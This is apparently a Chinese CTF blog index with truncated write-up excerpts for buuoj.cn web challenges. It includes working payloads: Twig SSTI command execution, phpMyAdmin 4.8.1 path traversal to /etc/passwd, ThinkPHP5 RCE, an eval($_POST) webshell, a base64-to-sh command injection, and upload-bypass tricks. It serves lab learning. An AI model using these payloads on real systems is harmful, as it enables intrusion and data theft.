BROTHERYY的博客

酷炫的欢迎界面，有1个flag.php和hint.phphint.php的页面元素发现了提示去flag.php发现存在模板注入然后提示说研究cookie，使用payloadpayload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat /flag”)}};flag：flag{985a0930-71c5-4a1a-9b7e-229400ecab55}...

嘻嘻发现url存在base64加密，尝试解密得到了加密规则，解密出来是图片的名字555.pngbase64->base64->hexTXpVek5UTTFNbVUzTURabE5qYz0->MzUzNTM1MmU3MDZlNjc=->3535352e706e67->555.png得到了加密规则，将index.php加密抓包得到源码hex->base64->base64最后加密完成是:TmprMlJUWTBOalUzT0RKRk56QTJPRGN3访.

开题以后是这样的一个界面，提示说找到了两个账户一个是cookie和monster。flag:flag{d3a403f9-9627-428d-8dbd-01b5ef49148a}

开题以后会一直跳转到/die/抓包查看获得了一个/chase/的路径继续查看得到了一串字符，可以发现flag被打乱了用脚本给组合一下from itertools import permutationsflag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"]item = permutations(flag)for a in item: k = ''.join(list(a)).

开题即送源码一份import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') # 有一个名为flag的config@app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') # 路径def shrine(shrine): def safe_j

这题一直出问题，用脚本跑到一半都会崩。后面换了一个，能够跑出来。详细情况可以看看Ying师傅的bloghttps://www.gem-love.com/ctf/1782.html我把跑出来的代码贴出来可以参考下# coding:utf-8 import requestsimport timeurl = 'http://2aa83373-6644-4c2f-904a-9f15560d4f1c.node3.buuoj.cn/'def str_hex(s): #十六进制转换 fl ==>

访问robots.txt发现hint.txt继续访问hint.txt得到过滤信息根据过滤信息写脚本进行注入import requestsimport stringfrom urllib import parsepasswd = ''string = string.ascii_lowercase + string.digits + '_'url = 'http://7a1bc649-4a1d-4e5b-a7cd-cb187958a399.node3.buuoj.cn/index.ph.

复现环境是:buuoj.cn会提示是cve 2020-7066点击这个View CTFHub，观察url地址栏，会出现一个ssrf类型的漏洞在检查网络状况里面发现有一个hint根据首页提示去构造一个payload?url =https://127.0.0.1%00.ctfhub.comtips提示最后必须是123结尾顺利拿到flagflag{8c5bd6ea-057e-46e3-9b00-4b30dc5f7610}CVE-2020-7066PHP 7.2.29之前的7.2.x

复现环境：buuoj.cn出题人是y1ng师傅~使用admin登录有提示框。使用其他账号登录获取数据包发现有其他页面访问这个页面翻译过来，意思是抱歉，此网站将在99年后开放！抓包发现有时间戳，把时间戳时间添加100年修改时间戳重发以后会提示Sorry, this site is only optimized for those who comes from localhost意思是只能本地用户访问添加Client-ip进行绕过添加Referer继续这里是个UA，替换U

复现环境：buuoj.cn上传题直接上传png和.htaccesscd连接flag{196e03ad-872b-44a3-9b8d-2526c9c49af2}

复现环境:buuoj.cn开题源码一份//I put something in F12 for youinclude 'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id

复现环境:buuoj.cn跟祖安人打个招呼吧~上传.jpg的马子复制路径/var/www/html/upload/9a5ee638f8d54695e513b45bd66602c7/1.jpg上传.htaccess解析jpg到根目录找flagflag{f36857f9-ac68-4756-b791-4ce7f2c8f393}

复现环境：buuoj.cn./git下有两个php文件flag.phpindex.php审计下代码，发现是$$导致变量覆盖漏洞http://5da85007-ec56-448d-b979-80f53cecc20f.node3.buuoj.cn/index.html?yds=flagflag{895a8277-0a85-4fdf-8252-e1ab74b8750f}

复现环境：buuoj.cn我是从题目猜到有phpmyadmin，直接就输入就进去了看一下版本信息phpmyadmin4.8.0-4.8.1存在文件包含漏洞使用网上的payload直接打?target=db_datadict.php%253f/../../../../../../../../etc/passwd能够执行，修改为flagflag{15aa1a13-8298-433c-8139-4ff6a0ffb5d6}...

复现环境：buuoj.cn代码提示有eval函数可以执行base64加密代码成功回显了phpinfo信息编辑一句话上传eval($_POST[1]);根目录上有flag和readflag，但都没法访问，应该是权限不够bypass disable_functions 该漏洞可以执行命令执行exp链接:https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php上传到有权限的目录/tmp?Ginkg

复现环境：buuoj.cn使用GitHack下载源码index.php使用print_r(scandir(current(localeconv())));查看目录最终完整exp：?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));用到的函数print_r()scandir()localeconv()current()next()array_reverse()highlight_file

复现环境：buuoj.cn这里有个小提示输入商品编号和价格的时候提示商品出错，可能是被买完了！！再尝试购买第四个的时候，发现不一样的提示告诉了我们只能使用一个字符，所以猜测出题人是购买第四只独角兽，获取flag，于是我们需要找到一个字符比1337大的数字，也就是utf-8编码的转换。https://www.compart.com/en/unicode/搜索大于 thousand 的单个字符将0x替换成%%F0%90%84%ABflag{39f5b9b7-8b41-4853-a

复现环境：buuoj.cn打开题目发现过滤了一些关键字发现跟强网杯的随便注一样，可以使用堆叠注入。可以看到有FlagHere和words这两个表，过滤了一些关键字这里使用mysql特有的查询-handler通过handler table_name open打开一张表，在这里声明一个名为table_name的句柄。通过handler table_name read first获取句柄的第一行，通过read next依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。详细的

复现环境：buuoj.cnunion被过滤了 ，会被他抓住，使用updatexml得到表名得到字段查询username和password查询密码发现不能显示完全使用left和right进行查询left=flag{2b77bf01-867e-4b28-a801-0right=4-be1d-4be4-bc1b-24069dfe9222}拼凑得到flagflag{2b77bf01-867e-4b28-a801-04-be1d-4be4-bc1b-24069dfe9222}...

复现环境：buuoj.cn查看页面源代码发现有个search.php，访问这个文件以后发现有base32编码在网上对其解码后得到在登录发现存在账号admin，使用联合查询联合查询并不存在的数据时，联合查询就会构造一个虚拟的数据。这时候直接在pass框里面输入e10adc3949ba59abbe56e057f20f883e的md5解密结果就可以了。flag{360b0328-2477-4a68-801b-4f3fed8217a0}...

复现环境：buuoj.cn发现是thinkphp5，让页面报错找到了具体的版本号。上网找了这个漏洞的payloadPOST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /使用hackbar的post传递这个参数进去，查看根目录下的文件读取flagflag{dc909607-e27c-40a9-86e8-2de6079ed503}...

复现环境：buuoj.cn<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])) { //get传递参数 highlight_file(__FILE__);} else { $host = $_GET['host']; $host = es

复现环境:buuoj.cn打开环境，最开始用弱口令进去了，还心想比较简单，后来发现错了，然后点击help发现有报错访问这个地址tips:WEB-INF知识点WEB-INF主要包含一下文件或目录:/WEB-INF/web.xml：Web应用程序配置文件，描述了 servlet 和其他的应用组件配置及命名规则。/WEB-INF/classes/：含了站点所有用的 class 文件，包括 servlet class 和非servlet class，他们不能包含在 .jar文件中/WEB-INF/

复现环境:buuoj.cn打开环境得到了提示百度看了md5($pass,true)总结: ffifdyop这个字符串其哈希值：276f722736c95d99e921722cf9ed621c字符串: ‘or’6select * from admin where password=’’or’6‘相当于万能密码，条件永真。进入以后查看源代码数组绕过。原理是md5等函数不能处理数组，导致函数返回Null。而Null是等于Null的，导致了绕过，传入参数a[]=1&b[]=2，进入下

复现环境:buuoj.cn根据提示知道是ssti模板注入，使用tplmap进行注入。发现存在代码执行tplmap在github上下载，好像只能用py2运行，我在py3运行会报错查看flagflag{9d83b5bd-72fd-468e-93a6-90237a167245}

复现环境:buuoj.cn开题漆黑一片，注意观察中间，有个灯泡，鼠标移动上去以后会有上传的提示查看下页面代码，发现有前端js验证删除以后，发现很多都无法上传，最后phtml能够上传成功，这里可以不用GIF文件头访问地址，蚁剑连接也可以直接在phtml里面添加<script language='php'>system('cat /flag');</script>直接在访问上传的文件名的时候就读出flag....

复现环境:buuoj.cn这个题是文件上传，这道题考了文件头绕过以及js代码绕过猜测路径为upload/shell.phtml连接蚁剑或者菜刀终端，查看flagflag{a8195fa0-4897-4bb6-81fb-c184a02ed657}

复现环境:buuoj.cn他又来了，上次被日了，这次还是要被日发现被过滤了用双写绕过获取所有数据库获取ctf库中所有的表获取表内字段获取表内数据flag{85f76441-5982-4c33-975e-23a8f7365874}

复现环境:buuoj.cn下载下来的源码很大，大到让人傻掉看了下大佬的wp 是说找出这些源码中所有的GET和POST请求，模拟请求一遍，看看那个能RCE能够使用。这里贴出赵师傅的Python脚本 膜一波import osimport threadingfrom concurrent.futures.thread import ThreadPoolExecutorimport requestssession = requests.Session()path = "/Users/ji

复现环境:buuoj.cn提示说需要找到源码扫了一把没扫到，最开始没看到扫描的结果，后面手动输入的时候就发现了，回头去看结果发现没扫出来，可能哪里出问题了。分析一下源码<?phpinclude_once "flag.php";if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval(

复现环境:buuoj.cn开题源码一份分析源码需要将内容"welcome to the zjctf"传入到$text，才能有下一步操作payload:/?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=然后是file参数，使用filter来读取useless.php，解码得源码<?php class Flag{ //flag.php public $file; public functi

复现环境:buuoj.cn通过菜单进入到pay.php,根据下面提示说要post传递数据，使用bp抓包根据提示进行绕过，不用科学计数会提示长度错误，下面是另外一种方法strcmp函数特性绕过

复现环境:buuoj.cn输入0：Error Occured When Fetch Result.输入1：Hello, glzjin wants a girlfriend.输入2：Do you want to be my girlfriend?输入3：Error Occured When Fetch Result.题目提示信息说表名和字段名都是flag，给出id就能得到flag贴出代码import requestsimport timeimport reurl=''flag = ''

复现环境:buuoj.cn扫描得到robots.txt flag.php输入robots.txt访问访问.bak<?phpclass UserInfo{ public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name;

//复现环境:buuoj.cnping就完事直接看看根目录有没有什么惊喜cat /flag

复现环境:buuoj.cn通过tips知道文件名为flag.php，直接上伪协议读flag.phpphp://filter/read=convert.base64-encode/resource=flag.php解码网站解码得flag

复现环境:buuoj.cn开题发现是命令执行的题ls查看下使用cat发现空格被过滤了，这里用$IFS$1来代替空格,读取flag.php也被过滤了，这里读取index.php根据过滤来构建payloadY2F0IGZsYWcucGhw 是cat flag.php的base64编码echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh我只做了这个解法，但这题还有其他的解法。...

复现环境:buuoj.cn尝试了各种上传绕过的方法，但依然还是不行，看了下其他大佬的wp，茅塞顿开，也说明我太菜了。写入保存将ctf.txt改为ctf.jpgauto_prepend_file 表示在php程序加载应用程序前加载指定的php文件auto_append_file 表示在php代码执行完毕后加载指定的php文件自定义的.user,ini先执行auto_prepend_file函数，auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件，也就是先加

复现地址:buuoj.cn打开环境是一个简单的介绍在页面源代码处得到有用信息访问Sercet.php得到了这个提示，利用burp来伪造Referer: https://www.Sycsecret.comUser-Agent: SycloverX-Forwarded-For: 127.0.0.1

复现环境:buuoj.cn进入环境得到提示白给了兄弟！直接上菜刀或者蚁剑连上以后直接到根目录去找！